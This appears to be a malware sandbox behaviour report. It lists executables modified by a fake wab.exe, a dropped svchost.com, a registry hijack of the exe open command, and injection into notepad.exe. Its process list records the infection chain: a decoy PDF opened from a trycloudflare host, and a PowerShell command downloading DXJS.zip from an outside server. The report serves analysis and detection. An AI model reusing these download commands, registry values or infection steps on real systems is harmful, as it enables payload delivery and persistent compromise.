File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\pwahelper.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\BHO\ie_to_edge_stub.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\msedgewebview2.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13187~1.37\MICROS~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\cookie_exporter.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\identity_helper.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\msedge_pwa_launcher.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\124024~1.80\msedge_proxy.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A
N/A N/A C:\Users\Admin\Downloads\Python\Python312\python.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Windows\System32\notepad.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2440 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2440 wrote to memory of 1000 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2440 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2440 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2440 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 6064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 6064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2440 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Downloads\Python\Python312\python.exe
PID 2440 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Downloads\Python\Python312\python.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe
PID 3316 wrote to memory of 2404 N/A C:\Users\Admin\Downloads\Python\Python312\python.exe C:\Windows\System32\notepad.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://floor-contemporary-genius-accommodation.trycloudflare.com/VB.pdf

C:\Windows\system32\timeout.exe

timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoicetrycloudflare.com:9983/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=2588,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=3808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4048,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=1632,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5340,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5456,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5648 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --init-isolate-as-foreground --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5916,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --no-appcompat-clear --field-trial-handle=6072,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=6116 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6220,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=6300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5676,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=5696 /prefetch:8

